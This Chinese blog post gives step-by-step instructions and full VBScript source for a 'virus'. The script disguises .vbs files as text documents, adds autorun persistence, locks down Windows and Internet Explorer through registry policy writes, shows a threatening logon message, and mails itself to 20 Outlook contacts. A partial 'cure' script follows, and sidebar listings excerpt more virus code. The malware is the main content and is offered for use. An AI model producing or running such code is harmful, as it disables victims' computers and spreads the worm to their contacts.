制作一个电脑后缀名为.vbs病毒

最新推荐文章于 2024-02-22 17:01:50 发布
最新推荐文章于 2024-02-22 17:01:50 发布
阅读量360 收藏 1
点赞数 1
文章标签: 代码规范
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hxwhi/article/details/130916260
版权

在这里给大家制作一个VBS病毒,还望大家笑纳。

(后面还会说解毒VBS代码)

工具/原料

  • 电脑

方法/步骤

  1. 首先创建文本文档,初始后缀名为.txt

  2. 右键编辑,进入记事本

  3. 输入以下的代码

    On Error Resume Next

Set fs=CreateObject("Scripting.FileSystemObject")

Set dir1=fs.GetSpecialFolder(0)

Set dir2=fs.GetSpecialFolder(1)

Set so=CreateObject("Scripting.FileSystemObject")

dim r

Set r=CreateObject("Wscript.Shell")

r.Regwrite "HKLM\Software\classes\vbsfile\defaulticon\","shell32.dll,-152"

r.Regwrite "HKLM\Software\classes\vbsfile\","文本文档"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"

r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好!"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你的电脑已经毁掉。请立即更新。"

Set ol=CreateObject("Outlook.Application")

On Error Resume Next

For x=1 To 20

Set Mail=ol.CreateItem(0)

Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)

Mail.Subject="你没事吧?"

Mail.Body="我给你发了一个邮件,里面有妙方。"

Mail.Attachments.Add(dir2&"Win32system.vbs")

Mail.Send

Next

ol.Quit

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"

r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","https://www.baidu.com/"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"

  4. 点击重名名选项,把文本文档的后缀名.txt改成.vbs

  5. 为了放置你的电脑的主机报废或者冒烟,所以我给出一下的解毒代码和方法以及步骤

  6. 再次创建文本文档,初始后缀名为.txt

  7. 右键编辑,进入记事本

  8. 输入以下的代码:

    et fs=CreateObject("Scripting.FileSystemObject")

Set dir1=fs.GetSpecialFolder(0)

Set dir2=fs.GetSpecialFolder(1)

Set so=CreateObject("Scripting.FileSystemObject")

dim r

Set r=CreateObject("Wscript.Shell")

r.Regwrite "HKLM\Software\classes\vbsfile\defaulticon\",dir1&"\wscript.exe,2"

r.Regwrite "HKLM\Software\classes\vbsfile\","VBScript Script file"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","scanregw.exe /autorun"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",0,"REG_DWORD"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system",""

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"

r.Regwrite "HKLM\Software\CLASSES\.reg\","regfile"

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption",""

r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText",""

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",0,"REG_DWORD"

r.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",0,"REG_DWORD"

r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"

    在此,小编提醒一下大家,此代码可以用于win7,如果你的电脑是win10或win11,那么恭喜你的电脑会把当做病毒处理,至于虚拟机软件,可以使用VMware Workstation Pro,具体详情请参照 那年我遇见了你 的文章,后续我也会慢慢做出一下的文章(制作不易,点个关注吧!)

最后的礼物......
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
制作一个后缀名为.vbs病毒代码
Hxwhi的博客
05-28 898
建议使用虚拟机(可以使用VMware Workstation Pro,可以参照 那年遇见了你 的发布的文章),否则你的计算机将会就地报废,使用时要关闭电脑病毒保护,如果使用的时候没有关,恭喜您的程序系统自带的病毒保护系统会被“就地枪决”)蠕虫是一种可以自我复制的代码,并且通过网络传播,通常无需人为干预就能传播。蠕虫病毒入侵并完全控制一台计算机之后,就会把这台机器作为宿主,进而扫描并感染其他计算机。蠕虫使用这种递归的方法进行传播,按照指数增长的规律分布自己,进而及时控制越来越多的计算机。废话不多说,上代码
VBS脚本遍历目录(递归调用)
06-07 1183
Set fso=createobject("scripting.filesystemobject") Set dc=fso.Drives For Each d in dc     If d.DriveType=1 or d.DriveType=2 Then        s=d.DriveLetter&":"        scan(s)     End If Next sub s
vbs计算机病毒代码,一段病毒常用的VBS代码
weixin_36298146的博客
07-28 2079
On error resume nextDim fso,wshell,curfolder,curdristr,curdriSet fso=createobject("scripting.filesystemobject")Set wshell=CreateObject("WScript.shell")Set curfolder=fso.GetFolder(".")curdristr=Left(WS...
VBS病毒(弹窗病毒
SUUUzhengji的博客
05-02 2881
(打开记事本复制后后缀名改成.vbs,引号内的内容可更改)对电脑无害,任务管理器可关闭,重启可关闭。
vbs病毒代码
hefenghhhh的专栏
10-06 9722
 vbs病毒代碼2007-07-11 21:26on error resume next set fs=createobject("ing.filesystemobject" 创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作 set dir1=fs.getspecialfolder(0) 获取windows/winnt文件夹位置 set dir
修改文件后缀名工具.zip
06-24
“修改文件后缀名工具”是一个实用的小程序,专门用于批量更改文件的后缀名。这个工具适用于那些需要统一调整大量文件后缀名的情况,例如在转换文件格式或者进行数据迁移时。它的主要功能包括: 1. **选择文件所在...
电脑文件后缀名大全.docx
09-27
电脑文件后缀名大全 电脑文件后缀名大全是指计算机文件系统中用于标识文件类型和格式的字符串,通常位于文件名的最后部分。了解文件后缀名的意义和用途对于文件管理和识别非常重要。本文将对常见的电脑文件后缀名...
所有文件后缀名大全.doc
03-11
在计算机世界里,文件后缀名通常由一个点(.)后面跟随的一系列字符组成,例如 `.doc`、`.pdf`、`.jpg` 等。 以下是一些常见的文件后缀名及其用途: 1. **.doc**: 这是 Microsoft Word 创建的文档文件,用于文本...
后缀名小词典.zip易语言项目例子源码下载
03-22
这个项目的主要目标是为用户提供一个能够识别和解释各种文件后缀名的工具,帮助用户理解不同文件类型及其用途。下面将详细探讨这个项目中涉及的IT知识点。 1. **易语言**:易语言是一种简洁、直观、面向对象的编程...
易语言源码获取网络文件的后缀名.rar
02-22
易语言源码获取网络文件的后缀名.rar 易语言源码获取网络文件的后缀名.rar 易语言源码获取网络文件的后缀名.rar 易语言源码获取网络文件的后缀名.rar 易语言源码获取网络文件的后缀名.rar 易语言源码获取网络...
Windows小病毒:吓人但无危害
2301_77765180的博客
07-15 800
免责声明:运行本文中的项目导致与朋友闹翻、被对象甩、电脑冒烟,本人概不负责😂。本系列小病毒可用记事本编辑,编辑好后命名为“惊喜.vbs”,双击即可运行。注意:该文件只能命名为boo.bat,不然会报错。运行有风险,尝试需谨慎。连截屏都截不了,只能拍照了。本系列用记事本编辑后命名为“名字.bat”,双击运行即可。只要你按“否”,弹窗就不会关闭。解决办法很简单,关机就行了。这时,按“确定”即可退出。二、批处理文件(bat)版。(2)大佬级:打开窗口。(3)大神级:死循环。
今天,给大家分享我自己做的vbs病毒(无害版)。可能会有杀毒软件报毒,请添加到信任区!!!
2301_76582723的博客
02-05 419
最后说一下,账号是"A ",密码是"114514"代码有点长,不喜勿喷。
VBS简介、实例(一)—— 整蛊小病毒
最新发布
Tang961216的博客
02-22 2220
VBS的简介、实例
怎样防范vbs脚本病毒
persistence勿忘初心
12-13 2037
https://blog.csdn.net/persistencegoing/article/details/84376427 大早上,发现服务器被人攻击了,所有的 html 都被植入了一段 vbscript <!DOCTYPE html> <html>         <head>                 <me...
VBS病毒的解决办法!
jeffery的专栏
09-07 9231
最近电脑中了VBS病毒,都被它搞死了,试了多种方法都搞不定!在网上查了多种的方法,终于把它给查杀了,现在把它总结一下与大家分享.Worm.VBS.headtail.a病毒分析Worm.VBS.headtail.a病毒分析Worm.VBS.headtail.a病毒分析病毒名称:Worm.VBS.headtail.a病毒类型:蠕虫病毒病毒语言:Visual Basic关联文件:WScript.exe多
清除IEXPLORER.EXE病毒
风流浪子的专栏
04-23 1万+
E枭雄 (Trojan.Nethief.IExplorer)病毒档案  “网络枭雄”病毒一个新变种!值得关注。警惕程度:★★★★发作时间:随机         病毒类型:木马病毒传播方式:网络 感染对象:网络  病毒介绍:此 病毒是网络枭雄病毒一个新变种,可以在Windows 9X、Windows NT、Windows 2000、Windows XP等操作系统环境下 正常运行。此病毒将自己拷贝
自己创作的一个简单的蠕虫病毒
qq_42415664的博客
03-27 8268
哈哈哈,好久没更新了,so,话不多说,因为我是学生嘛,任务艰巨。 下面是源代码 on error resume next set fs=createobject("ing.filesystemobject" set dir1=fs.getspecialfolder(0) set dir2=fs.getspecialfolder(1) set so=createobject("ing.fi...
教你写一个简单实用的病毒
qq_36916968的博客
12-08 2596
首先,打开记事本,输入 Const strPassword = “sigaide”’ Dim WshNetwork Set WshNetwork = CreateObject(“WScript.Network”) Dim userName userName = WshNetwork.userName&",user" Dim Domain Set Domain = GetObject(“Wi...
最全的vbs病毒代码,you破坏性的。
热门推荐
暖心少年
08-20 2万+
On Error Resume Next dim avest,xufso,wscrt Set avest = WScript.Createobject("WScript.Shell") Set wscrt = WScript.Createobject("WScript.Shell") Set xufso = CreateObject("Scripting.FileSystemObject") av...
怎么用NASM做一个后缀名为.ink的软
02-06
2. 创建一个新的文本文件,并使用 NASM 的汇编语言编写代码。 3. 使用 NASM 编译器将汇编语言代码编译成可执行文件。例如,在命令行中输入: ``` nasm -f elf64 -o myprogram.o myprogram.asm ``` 4. 使用链接器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值